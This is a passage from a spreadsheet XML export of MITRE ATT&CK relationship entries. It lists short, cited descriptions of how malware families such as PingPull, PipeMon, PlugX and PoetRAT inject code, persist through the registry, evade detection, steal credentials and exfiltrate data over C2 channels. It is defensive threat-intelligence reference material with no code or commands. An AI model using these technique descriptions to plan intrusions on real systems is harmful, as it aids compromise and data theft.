    <t>relationship--efea6d26-7372-45bb-81bb-1e300abd5b13</t>
  </si>
  <si>
    <t>[Pillowmint](https://attack.mitre.org/software/S0517) has used the NtQueueApcThread syscall to inject code into svchost.exe.(Citation: Trustwave Pillowmint June 2020)</t>
  </si>
  <si>
    <t>relationship--2dfd662a-231a-4b4c-b7e6-b61058fc4494</t>
  </si>
  <si>
    <t>[Pillowmint](https://attack.mitre.org/software/S0517) can uninstall the malicious service from an infected machine.(Citation: Trustwave Pillowmint June 2020)</t>
  </si>
  <si>
    <t>relationship--7e6700e2-4a06-4583-933b-53d3a2761af7</t>
  </si>
  <si>
    <t>[Pillowmint](https://attack.mitre.org/software/S0517) has collected credit card data using native API functions.(Citation: Trustwave Pillowmint June 2020)</t>
  </si>
  <si>
    <t>relationship--bcd496b7-7e6a-483b-b1d4-f7dc935a563d</t>
  </si>
  <si>
    <t xml:space="preserve">[Pillowmint](https://attack.mitre.org/software/S0517) has been decompressed by included shellcode prior to being launched.(Citation: Trustwave Pillowmint June 2020)	</t>
  </si>
  <si>
    <t>relationship--abece522-51dc-4904-b0f9-585db7fb0223</t>
  </si>
  <si>
    <t>[Pillowmint](https://attack.mitre.org/software/S0517) has deleted the filepath &lt;code&gt;%APPDATA%\Intel\devmonsrv.exe&lt;/code&gt;.(Citation: Trustwave Pillowmint June 2020)</t>
  </si>
  <si>
    <t>relationship--d0c8b03f-7c57-4156-bc5e-cd0c45327ef3</t>
  </si>
  <si>
    <t>[Pillowmint](https://attack.mitre.org/software/S0517) has stored a compressed payload in the Registry key &lt;code&gt;HKLM\SOFTWARE\Microsoft\DRM&lt;/code&gt;.(Citation: Trustwave Pillowmint June 2020)</t>
  </si>
  <si>
    <t>relationship--690d1b72-9fb0-426a-9db4-075abf045688</t>
  </si>
  <si>
    <t>[Pillowmint](https://attack.mitre.org/software/S0517) has modified the Registry key &lt;code&gt;HKLM\SOFTWARE\Microsoft\DRM&lt;/code&gt; to store a malicious payload.(Citation: Trustwave Pillowmint June 2020)</t>
  </si>
  <si>
    <t>relationship--332ce4cd-311a-457f-ae10-6d8e3ef7bc77</t>
  </si>
  <si>
    <t>[Pillowmint](https://attack.mitre.org/software/S0517) has used multiple native Windows APIs to execute and conduct process injections.(Citation: Trustwave Pillowmint June 2020)</t>
  </si>
  <si>
    <t>relationship--9ac9325d-067d-4936-9c8d-159e21bd04c4</t>
  </si>
  <si>
    <t xml:space="preserve">[Pillowmint](https://attack.mitre.org/software/S0517) has been compressed and stored within a registry key. [Pillowmint](https://attack.mitre.org/software/S0517) has also obfuscated the AES key used for encryption.(Citation: Trustwave Pillowmint June 2020)	</t>
  </si>
  <si>
    <t>relationship--426db174-3cc4-4f9c-ae34-6398a86ec3bd</t>
  </si>
  <si>
    <t xml:space="preserve">[Pillowmint](https://attack.mitre.org/software/S0517) has used a PowerShell script to install a shim database.(Citation: Trustwave Pillowmint June 2020)	</t>
  </si>
  <si>
    <t>relationship--a8a65990-8385-440b-8733-940a69b05f4e</t>
  </si>
  <si>
    <t xml:space="preserve">[Pillowmint](https://attack.mitre.org/software/S0517) can iterate through running processes every six seconds collecting a list of processes to capture from later.(Citation: Trustwave Pillowmint June 2020)	</t>
  </si>
  <si>
    <t>relationship--8977c8db-64e4-44b5-bee9-362779624a42</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</si>
  <si>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</si>
  <si>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relationship--3454bb10-fad3-48b6-b20a-81cb45e7bbc1</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</si>
  <si>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</si>
  <si>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relationship--c23fa4f7-84a0-424a-b8b1-b3024d01e749</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</si>
  <si>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</si>
  <si>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relationship--d5943cbb-6a13-41ff-9aaf-4213b46b83cd</t>
  </si>
  <si>
    <t>[PinchDuke](https://attack.mitre.org/software/S0048) collects user files from the compromised host based on predefined file extensions.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>relationship--d77a4123-3d46-4317-8921-f6eb8c34c585</t>
  </si>
  <si>
    <t>[PinchDuke](https://attack.mitre.org/software/S0048) searches for files created within a certain timeframe and whose file extension matches a predefined list.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>relationship--1fbde0c8-1b00-40bf-8fef-11892d103d63</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</si>
  <si>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</si>
  <si>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relationship--2e80a049-220e-4d47-98f7-c0dbfe245cdc</t>
  </si>
  <si>
    <t>[PinchDuke](https://attack.mitre.org/software/S0048) gathers system configuration information.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>relationship--7b29c94f-1834-42ac-933c-ae6cd125e87a</t>
  </si>
  <si>
    <t>[PinchDuke](https://attack.mitre.org/software/S0048) transfers files from the compromised host via HTTP or HTTPS to a C2 server.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>relationship--3acdd018-80a0-4005-bab9-0cf89acfa43a</t>
  </si>
  <si>
    <t>[Ping](https://attack.mitre.org/software/S0097) can be used to identify remote systems within a network.(Citation: TechNet Ping)</t>
  </si>
  <si>
    <t>relationship--9b2356e1-6544-40a7-a694-8ac36a1da1b7</t>
  </si>
  <si>
    <t>[PingPull](https://attack.mitre.org/software/S1031) can collect data from a compromised host.(Citation: Unit 42 PingPull Jun 2022)</t>
  </si>
  <si>
    <t>relationship--2ea75990-7349-4d67-8ec1-f4168792af23</t>
  </si>
  <si>
    <t>[PingPull](https://attack.mitre.org/software/S1031) can decrypt received data from its C2 server by using AES.(Citation: Unit 42 PingPull Jun 2022)</t>
  </si>
  <si>
    <t>relationship--d0a02e9b-9247-4bce-9070-649d7c908640</t>
  </si>
  <si>
    <t>[PingPull](https://attack.mitre.org/software/S1031) has the ability to exfiltrate stolen victim data through its C2 channel.(Citation: Unit 42 PingPull Jun 2022)</t>
  </si>
  <si>
    <t>relationship--f72dda85-719d-4e6f-bac8-2589934ae6dd</t>
  </si>
  <si>
    <t>[PingPull](https://attack.mitre.org/software/S1031) can enumerate storage volumes and folder contents of a compromised host.(Citation: Unit 42 PingPull Jun 2022)</t>
  </si>
  <si>
    <t>relationship--262fe71a-a2d5-4624-ac50-5a76c0dd862e</t>
  </si>
  <si>
    <t>[PingPull](https://attack.mitre.org/software/S1031) can mimic the names and descriptions of legitimate services such as `iphlpsvc`, `IP Helper`,  and `Onedrive` to evade detection.(Citation: Unit 42 PingPull Jun 2022)</t>
  </si>
  <si>
    <t>relationship--5647a587-99fc-497b-80b7-ed63ee6126a6</t>
  </si>
  <si>
    <t xml:space="preserve"> [PingPull](https://attack.mitre.org/software/S1031) variants have the ability to communicate with C2 servers using ICMP or TCP.(Citation: Unit 42 PingPull Jun 2022)</t>
  </si>
  <si>
    <t>relationship--a877e5c0-3fe6-40bb-bd02-ef4a9465aba3</t>
  </si>
  <si>
    <t>[PingPull](https://attack.mitre.org/software/S1031) can use HTTPS over port 8080 for C2.(Citation: Unit 42 PingPull Jun 2022)</t>
  </si>
  <si>
    <t>relationship--0b2b567c-718c-485f-b187-2bf6c6bb0c76</t>
  </si>
  <si>
    <t>[PingPull](https://attack.mitre.org/software/S1031) can encode C2 traffic with Base64.(Citation: Unit 42 PingPull Jun 2022)</t>
  </si>
  <si>
    <t>relationship--5ef73661-0bc8-47f5-bae6-2beb5342a68e</t>
  </si>
  <si>
    <t>[PingPull](https://attack.mitre.org/software/S1031) can use AES, in cipher block chaining (CBC) mode padded with PKCS5, to encrypt C2 server communications.(Citation: Unit 42 PingPull Jun 2022)</t>
  </si>
  <si>
    <t>relationship--ffe85478-e3ed-4856-b4ae-03a7b693e381</t>
  </si>
  <si>
    <t>[PingPull](https://attack.mitre.org/software/S1031) can retrieve the hostname of a compromised host.(Citation: Unit 42 PingPull Jun 2022)</t>
  </si>
  <si>
    <t>relationship--4e109125-e22b-4aaf-ac3c-9a0f5351b440</t>
  </si>
  <si>
    <t>[PingPull](https://attack.mitre.org/software/S1031) can retrieve the IP address of a compromised host.(Citation: Unit 42 PingPull Jun 2022)</t>
  </si>
  <si>
    <t>relationship--5cca2310-8771-48d9-9db8-b7a7a2375960</t>
  </si>
  <si>
    <t>[PingPull](https://attack.mitre.org/software/S1031) has the ability to timestomp a file.(Citation: Unit 42 PingPull Jun 2022)</t>
  </si>
  <si>
    <t>relationship--9d8296bb-40a0-4a08-a01a-f6dd4409c6f1</t>
  </si>
  <si>
    <t>A [PingPull](https://attack.mitre.org/software/S1031) variant can communicate with its C2 servers by using HTTPS.(Citation: Unit 42 PingPull Jun 2022)</t>
  </si>
  <si>
    <t>relationship--39c0a771-5e52-4d08-910f-a1c9b3989f68</t>
  </si>
  <si>
    <t>[PingPull](https://attack.mitre.org/software/S1031) can use `cmd.exe` to run various commands as a reverse shell.(Citation: Unit 42 PingPull Jun 2022)</t>
  </si>
  <si>
    <t>relationship--cc35f625-8da3-4d4d-a9bf-a600183d7230</t>
  </si>
  <si>
    <t>[PingPull](https://attack.mitre.org/software/S1031) has the ability to install itself as a service.(Citation: Unit 42 PingPull Jun 2022)</t>
  </si>
  <si>
    <t>relationship--8e6e2f98-695a-462b-b9b1-c3d0c453e471</t>
  </si>
  <si>
    <t>[PipeMon](https://attack.mitre.org/software/S0501) installer can use UAC bypass techniques to install the payload.(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>relationship--88111958-702b-4bfb-9ad1-c329491df5be</t>
  </si>
  <si>
    <t>[PipeMon](https://attack.mitre.org/software/S0501), its installer, and tools are signed with stolen code-signing certificates.(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>relationship--ec536758-9478-4bf9-9abd-69755d8382d2</t>
  </si>
  <si>
    <t>[PipeMon](https://attack.mitre.org/software/S0501) can attempt to gain administrative privileges using token impersonation.(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>relationship--125d8dab-512b-445a-9f28-b2113c714b77</t>
  </si>
  <si>
    <t>[PipeMon](https://attack.mitre.org/software/S0501) can decrypt password-protected executables.(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>relationship--d2bc4516-c074-4d44-9931-07ab518de60a</t>
  </si>
  <si>
    <t>[PipeMon](https://attack.mitre.org/software/S0501) can inject its modules into various processes using reflective DLL loading.(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>relationship--4d5f07bd-985d-4dee-8f1b-9143fb158438</t>
  </si>
  <si>
    <t>[PipeMon](https://attack.mitre.org/software/S0501) can switch to an alternate C2 domain when a particular date has been reached.(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>relationship--ecca736a-9b3f-4a1d-bdb8-ff5c55197893</t>
  </si>
  <si>
    <t>[PipeMon](https://attack.mitre.org/software/S0501) has stored its encrypted payload in the Registry under `HKLM\SOFTWARE\Microsoft\Print\Components\`.(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>relationship--e27416ae-e9f1-4b3f-90b2-6cb4a1a6abf4</t>
  </si>
  <si>
    <t>[PipeMon](https://attack.mitre.org/software/S0501) can install additional modules via C2 commands.(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>relationship--3e18f486-1e6f-49fa-8b99-4daf615d3e8d</t>
  </si>
  <si>
    <t>[PipeMon](https://attack.mitre.org/software/S0501) modules are stored on disk with seemingly benign names including use of a file extension associated with a popular word processor.(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>relationship--ee4e5ea3-3d81-42ab-b259-9970f1f7d736</t>
  </si>
  <si>
    <t>[PipeMon](https://attack.mitre.org/software/S0501) has modified the Registry to store its encrypted payload.(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>relationship--33823f15-f43f-41ef-bc14-7dea2ab21acf</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</si>
  <si>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</si>
  <si>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relationship--dfea8f12-5c47-4a11-a4ed-06d08192b9ab</t>
  </si>
  <si>
    <t>The [PipeMon](https://attack.mitre.org/software/S0501) communication module can use a custom protocol based on TLS over TCP.(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>relationship--7b510a6f-3e11-49b3-bf97-a1ca24bca663</t>
  </si>
  <si>
    <t>[PipeMon](https://attack.mitre.org/software/S0501) modules are stored encrypted on disk.(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>relationship--37451dee-6837-46c5-a9e5-ff64f26f66d2</t>
  </si>
  <si>
    <t>[PipeMon](https://attack.mitre.org/software/S0501) can use parent PID spoofing to elevate privileges.(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>relationship--a979f700-7319-4d37-bb3e-592e3a1bf878</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</si>
  <si>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</si>
  <si>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relationship--74bc9883-6d48-4e68-bc61-1fea450e89e7</t>
  </si>
  <si>
    <t>[PipeMon](https://attack.mitre.org/software/S0501) can iterate over the running processes to find a suitable injection target.(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>relationship--8ead6aa1-dbbe-4e8f-b542-66af9b5f2c33</t>
  </si>
  <si>
    <t>[PipeMon](https://attack.mitre.org/software/S0501) can check for the presence of ESET and Kaspersky security software.(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>relationship--f3afa419-b741-4a1c-bb4d-569cde6ab558</t>
  </si>
  <si>
    <t>[PipeMon](https://attack.mitre.org/software/S0501) has used call to &lt;code&gt;LoadLibrary&lt;/code&gt; to load its installer. [PipeMon](https://attack.mitre.org/software/S0501) loads its modules using reflective loading or custom shellcode.(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>relationship--f77738b8-e17c-4b6b-98fc-ffcc569cc008</t>
  </si>
  <si>
    <t>[PipeMon](https://attack.mitre.org/software/S0501) communications are RC4 encrypted.(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>relationship--9bfcecc9-1a59-427c-9189-59a19c58e201</t>
  </si>
  <si>
    <t>[PipeMon](https://attack.mitre.org/software/S0501) can collect and send OS version and computer name as a part of its C2 beacon.(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>relationship--270c93ba-a3d4-4ace-8fad-691c64c13e2f</t>
  </si>
  <si>
    <t>[PipeMon](https://attack.mitre.org/software/S0501) can collect and send the local IP address, RDP information, and the network adapter physical address as a part of its C2 beacon.(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>relationship--ee8af4e9-8f2e-453f-82d2-d43861d9371e</t>
  </si>
  <si>
    <t>[PipeMon](https://attack.mitre.org/software/S0501) can send time zone information from a compromised host to C2.(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>relationship--96f5f2ec-28e6-4ed4-853e-9c6cadbe3dda</t>
  </si>
  <si>
    <t>[PipeMon](https://attack.mitre.org/software/S0501) can establish persistence by registering a malicious DLL as an alternative Print Processor which is loaded when the print spooler service starts.(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>relationship--e7cf27d5-f5ab-497b-8379-31730292ed81</t>
  </si>
  <si>
    <t>[Pisloader](https://attack.mitre.org/software/S0124) uses DNS as its C2 protocol.(Citation: Palo Alto DNS Requests)</t>
  </si>
  <si>
    <t>relationship--59d4e54d-66b8-4603-b189-ba67160da44d</t>
  </si>
  <si>
    <t>[Pisloader](https://attack.mitre.org/software/S0124) has commands to list drives on the victim machine and to list file information for a given directory.(Citation: Palo Alto DNS Requests)</t>
  </si>
  <si>
    <t>relationship--ed8b5029-835d-492c-a1f4-10ccbf084a76</t>
  </si>
  <si>
    <t>[Pisloader](https://attack.mitre.org/software/S0124) has a command to upload a file to the victim machine.(Citation: Palo Alto DNS Requests)</t>
  </si>
  <si>
    <t>relationship--ce4707f0-d5b8-4dd6-b5ab-cf1483dd236f</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</si>
  <si>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</si>
  <si>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relationship--cbc4c186-028e-4a24-93ff-5f2bb7edd98a</t>
  </si>
  <si>
    <t>[Pisloader](https://attack.mitre.org/software/S0124) establishes persistence via a Registry Run key.(Citation: Palo Alto DNS Requests)</t>
  </si>
  <si>
    <t>relationship--02a629d3-b970-43e8-a11b-79f35107a4c0</t>
  </si>
  <si>
    <t>Responses from the [Pisloader](https://attack.mitre.org/software/S0124) C2 server are base32-encoded.(Citation: Palo Alto DNS Requests)</t>
  </si>
  <si>
    <t>relationship--4ec9a523-e27f-4984-9bde-4af785e5e75a</t>
  </si>
  <si>
    <t>[Pisloader](https://attack.mitre.org/software/S0124) has a command to collect victim system information, including the system name and OS version.(Citation: Palo Alto DNS Requests)</t>
  </si>
  <si>
    <t>relationship--ed2e17b5-171b-4878-a3ab-2b70e8ca132a</t>
  </si>
  <si>
    <t>[Pisloader](https://attack.mitre.org/software/S0124) has a command to collect the victim's IP address.(Citation: Palo Alto DNS Requests)</t>
  </si>
  <si>
    <t>relationship--548e7315-5055-4434-96c1-1429779b0e2b</t>
  </si>
  <si>
    <t>[Pisloader](https://attack.mitre.org/software/S0124) uses cmd.exe to set the Registry Run key value. It also has a command to spawn a command shell.(Citation: Palo Alto DNS Requests)</t>
  </si>
  <si>
    <t>relationship--0c56b369-b665-4001-87ff-d27ae135cc64</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) has the ability to use DLL search order hijacking for installation on targeted systems.(Citation: Proofpoint TA416 Europe March 2022)</t>
  </si>
  <si>
    <t>relationship--54c3c155-6347-4dc5-89df-aae2c15d6c7a</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</si>
  <si>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</si>
  <si>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relationship--464ce0ed-31a5-4a99-9791-9ce5bb987f58</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) can be configured to use DNS for command and control.(Citation: Dell TG-3390)</t>
  </si>
  <si>
    <t>relationship--b4947254-3a74-4708-a45c-65eff5bd9a2c</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) uses Pastebin to store C2 addresses.(Citation: Palo Alto PlugX June 2017)</t>
  </si>
  <si>
    <t>relationship--3d97f57c-2a7c-4626-8b05-9d345047d3ad</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) decompresses and decrypts itself using the Microsoft API call RtlDecompressBuffer.(Citation: CIRCL PlugX March 2013)(Citation: Trend Micro DRBControl February 2020)(Citation: Proofpoint TA416 Europe March 2022)</t>
  </si>
  <si>
    <t>relationship--cb67b57d-2ab3-4971-9b8d-83768df36df0</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) has a module to enumerate drives and find files recursively.(Citation: CIRCL PlugX March 2013)(Citation: Proofpoint TA416 Europe March 2022)</t>
  </si>
  <si>
    <t>relationship--07702379-2d40-48ae-a077-d68e0da5e4be</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) can modify the characteristics of folders to hide them from the compromised user.(Citation: Proofpoint TA416 Europe March 2022)</t>
  </si>
  <si>
    <t>relationship--234205d5-cc99-435c-bbc8-e2c1d3eb0ac5</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) has a module to download and execute files on the compromised machine.(Citation: CIRCL PlugX March 2013)(Citation: Proofpoint TA416 Europe March 2022)</t>
  </si>
  <si>
    <t>relationship--7c8e34ad-89a4-44cf-bd56-d1583803f086</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) has a module for capturing keystrokes per process including window titles.(Citation: CIRCL PlugX March 2013)</t>
  </si>
  <si>
    <t>relationship--38f209df-bb69-4971-bbd8-db5a54bbf217</t>
  </si>
  <si>
    <t>A version of [PlugX](https://attack.mitre.org/software/S0013) loads as shellcode within a .NET Framework project using msbuild.exe, presumably to bypass application control techniques.(Citation: Palo Alto PlugX June 2017)</t>
  </si>
  <si>
    <t>relationship--652af94a-7ff3-4d47-89e5-154c7bc34258</t>
  </si>
  <si>
    <t>In one instance, [menuPass](https://attack.mitre.org/groups/G0045) added [PlugX](https://attack.mitre.org/software/S0013) as a service with a display name of "Corel Writing Tools Utility."(Citation: FireEye APT10 April 2017)</t>
  </si>
  <si>
    <t>relationship--0d989c2e-0207-4412-b52a-5d9bf9f96d18</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) has been disguised as legitimate Adobe and PotPlayer files.(Citation: Proofpoint TA416 Europe March 2022)</t>
  </si>
  <si>
    <t>relationship--8e824b6e-a0b7-4a57-9a7e-89b2c390beec</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) has a module to create, delete, or modify Registry keys.(Citation: CIRCL PlugX March 2013)</t>
  </si>
  <si>
    <t>relationship--067ece2b-4e66-437f-88e0-8dc3f076331b</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) can use the Windows API functions `GetProcAddress`, `LoadLibrary`, and `CreateProcess` to execute another process.(Citation: Lastline PlugX Analysis)(Citation: Proofpoint TA416 Europe March 2022)</t>
  </si>
  <si>
    <t>relationship--deafd60c-af1a-40eb-bc43-287b37553fae</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) has a module to enumerate network shares.(Citation: CIRCL PlugX March 2013)</t>
  </si>
  <si>
    <t>relationship--5e7460f8-9ea9-4aa4-b06e-15861b02d70e</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) can be configured to use raw TCP or UDP for command and control.(Citation: Dell TG-3390)</t>
  </si>
  <si>
    <t>relationship--2eaea386-ee0f-42c4-bca1-ce2d22062f98</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) can use API hashing and modify the names of strings to evade detection.(Citation: Trend Micro DRBControl February 2020)(Citation: Proofpoint TA416 Europe March 2022)</t>
  </si>
  <si>
    <t>relationship--e809f78f-344d-4169-a145-89023f4530d5</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) has a module to list the processes running on a machine.(Citation: CIRCL PlugX March 2013)</t>
  </si>
  <si>
    <t>relationship--4b8ebd1a-50ba-463a-b536-3ad8cc5013f8</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) can enumerate and query for information contained within the Windows Registry.(Citation: Lastline PlugX Analysis)(Citation: CIRCL PlugX March 2013)</t>
  </si>
  <si>
    <t>relationship--4cb1a0d0-6276-4c2c-b299-c26c982e9e1e</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) adds Run key entries in the Registry to establish persistence.(Citation: Lastline PlugX Analysis)(Citation: PWC Cloud Hopper Technical Annex April 2017)(Citation: CIRCL PlugX March 2013)</t>
  </si>
  <si>
    <t>relationship--a29d9514-3284-4ac2-a93a-e17750519534</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) allows the operator to capture screenshots.(Citation: CIRCL PlugX March 2013)</t>
  </si>
  <si>
    <t>relationship--bb39cbf2-a9dc-4c31-9fb9-b6c456c2005c</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) can use RC4 encryption in C2 communications.(Citation: Proofpoint TA416 Europe March 2022)</t>
  </si>
  <si>
    <t>relationship--c420d58d-2a7e-4eef-a12d-d37e4c9fc9b4</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) checks if VMware tools is running in the background by searching for any process named "vmtoolsd".(Citation: Unit42 PlugX June 2017)</t>
  </si>
  <si>
    <t>relationship--86b00142-a259-4237-b1a8-a8183d581b54</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) has a module for enumerating TCP and UDP network connections and associated processes using the &lt;code&gt;netstat&lt;/code&gt; command.(Citation: CIRCL PlugX March 2013)</t>
  </si>
  <si>
    <t>relationship--8b020cdd-4731-4dd5-8407-7f3076ab1d2d</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) can be configured to use HTTP for command and control.(Citation: Dell TG-3390)(Citation: Proofpoint TA416 Europe March 2022)</t>
  </si>
  <si>
    <t>relationship--6bf4098c-7667-44df-bdaa-076b9099f851</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) allows actors to spawn a reverse shell on a victim.(Citation: Dell TG-3390)(Citation: CIRCL PlugX March 2013)</t>
  </si>
  <si>
    <t>relationship--79106ad4-28d3-4f67-a2c3-116d138ec84a</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</si>
  <si>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</si>
  <si>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relationship--754790a1-86b9-4421-b8e9-84d3dee51097</t>
  </si>
  <si>
    <t>S0428</t>
  </si>
  <si>
    <t>PoetRAT</t>
  </si>
  <si>
    <t>malware--cc5497f7-a9e8-436f-94da-b2b4a9b9ad3c</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has the ability to compress files with zip.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>relationship--f64733fd-acc7-4570-90ee-79c117c37d7e</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) used TLS to encrypt command and control (C2) communications.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>relationship--c46db015-9917-4c7b-8152-c6ad1394baf7</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) used file system monitoring to track modification and enable automatic exfiltration.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>relationship--47aebf09-4bee-4639-94e3-27b095d7558a</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has `pyminifier` to obfuscate scripts.(Citation: Talos PoetRAT October 2020)</t>
  </si>
  <si>
    <t>relationship--0bb3a317-c459-4c7f-b47b-c0521d15bf62</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has executed a Lua script through a Lua interpreter for Windows.(Citation: Talos PoetRAT October 2020)</t>
  </si>
  <si>
    <t>relationship--e3c9ddee-8ace-4847-81ea-f7dfb8936d3b</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has used a Python tool named Browdec.exe to steal browser credentials.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>relationship--f3927864-d7dd-4bf3-8b2a-2a5445eb4004</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has used LZMA and base64 libraries to decode obfuscated scripts.(Citation: Talos PoetRAT October 2020)</t>
  </si>
  <si>
    <t>relationship--df0ee75f-5e10-40d7-a0ac-e6c281e0d4b9</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) was delivered with documents using DDE to execute malicious code.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>relationship--7ed3bfbd-41a7-46c4-acf7-43330dd50784</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has used a .NET tool named dog.exe to exiltrate information over an e-mail account.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>relationship--1b29f7b8-78fe-4bae-b943-59641a12a023</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has exfiltrated data over the C2 channel.(Citation: Talos PoetRAT October 2020)</t>
  </si>
  <si>
    <t>relationship--03f69381-89e2-411a-8302-323c8a1bddfa</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has used [ftp](https://attack.mitre.org/software/S0095) for exfiltration.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>relationship--613ba18d-d23b-443a-9e1a-c2d564132fe2</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has the ability to overwrite scripts and delete itself if a sandbox environment is detected.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>relationship--eeb86f2c-852e-42e6-8809-8d244727bdfe</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has used FTP for C2 communications.(Citation: Talos PoetRAT October 2020)</t>
  </si>
  <si>
    <t>relationship--0a0c827d-98ba-4f95-a6ef-b0a34765d0f4</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has the ability to list files upon receiving the &lt;code&gt;ls&lt;/code&gt; command from C2.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>relationship--2bcaf336-cd02-47e3-b73f-6f0c5cc3592f</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has the ability to hide and unhide files.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>relationship--3758634e-bb33-4354-98f3-b662e8e7e83f</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has the ability to copy files and download/upload files into C2 channels using FTP and HTTPS.(Citation: Talos PoetRAT April 2020)(Citation: Talos PoetRAT October 2020)</t>
  </si>
  <si>
    <t>relationship--3337112a-0b29-450f-9183-a0ec428c4898</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has used a Python tool named klog.exe for keylogging.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>relationship--fac88cac-2935-4c68-af9f-c16fb93d6eac</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) used voStro.exe, a compiled pypykatz (Python version of [Mimikatz](https://attack.mitre.org/software/S0002)), to steal credentials.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>relationship--9dcf5d9f-7e68-4a5c-a51c-f3c87d5833cd</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has used spearphishing attachments to infect victims.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>relationship--20118b8d-dc6e-4c71-8d99-789901c10e73</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has made registry modifications to alter its behavior upon execution.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>relationship--2606ed25-9f1d-4e85-822a-af39ce0d8e66</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) used TLS to encrypt communications over port 143(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
